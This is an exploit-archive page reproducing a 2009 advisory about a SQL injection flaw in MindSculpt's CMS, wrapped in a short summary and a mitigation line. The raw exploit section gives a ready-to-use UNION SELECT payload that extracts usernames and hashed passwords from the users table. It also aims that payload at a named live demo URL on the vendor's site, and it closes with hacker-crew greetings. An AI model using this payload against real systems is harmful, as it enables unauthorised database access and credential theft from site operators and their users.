header-logo
Suggest Exploit
vendor:
CMS Content Management System
by:
kaMtiEz
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: CMS Content Management System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

MindSculpt’s new CMS Content Management System SQL injection vulnerability – (cid[0])

A SQL injection vulnerability exists in MindSculpt's new CMS Content Management System. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames and hashed passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

#############################################################################################################
## MindSculpt's new C[M]S™ Content Management System SQL injection vulnerability - (cid[0])	           ##
## Author : kaMtiEz (kamzcrew@gmail.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : September 23, 2009 									   	   ##
#############################################################################################################

#############################################################################################################
# /~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__                                              #
# /~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_                                              #
# /~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__                                              #  
# /~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___                                              #
# /~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____                                              #
#____________________________________________________________ -=- KILL-9 CREW -=- INDONESIANCODER -=-       #
#                                                                                                           #
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.mindsculpt.com/
[+] Download : -
[+] Costs : $500
[+] Vulnerability : SQL injection
[+] Dork : Think iT

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?subj=[INDONESIANCODER]

[ Exploit ]

-666+union+select+1,concat_ws(0x3a,username,hashed_password),3,4,5+from+users--

[ Demo ]

http://www.mindsculpt.com/cms_demo/index.php?subj=-3+union+select+1,concat_ws(0x3a,username,hashed_password),3,4,5+from+users--

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,and YOU!!

[ NOTE ] 

[+] Mom and dad i love u .. for my girlfriends thx for your support mwahhhh ^_^
[+] terima kasih banget buat tukulesto dan arianom yang setiap malam menemani saya waktu exploit .. wkwkwkw
[+] -

[ QUOTE ]

[+] kaMtiEz -=- Don Tukulesto -=- M3NW5 -=- 30 hari mencari AuraKasih ....
[+] AURAKASIH I LOVE U FULL arghhhhh ...

Navigation

Suggest Exploit

Services By CQR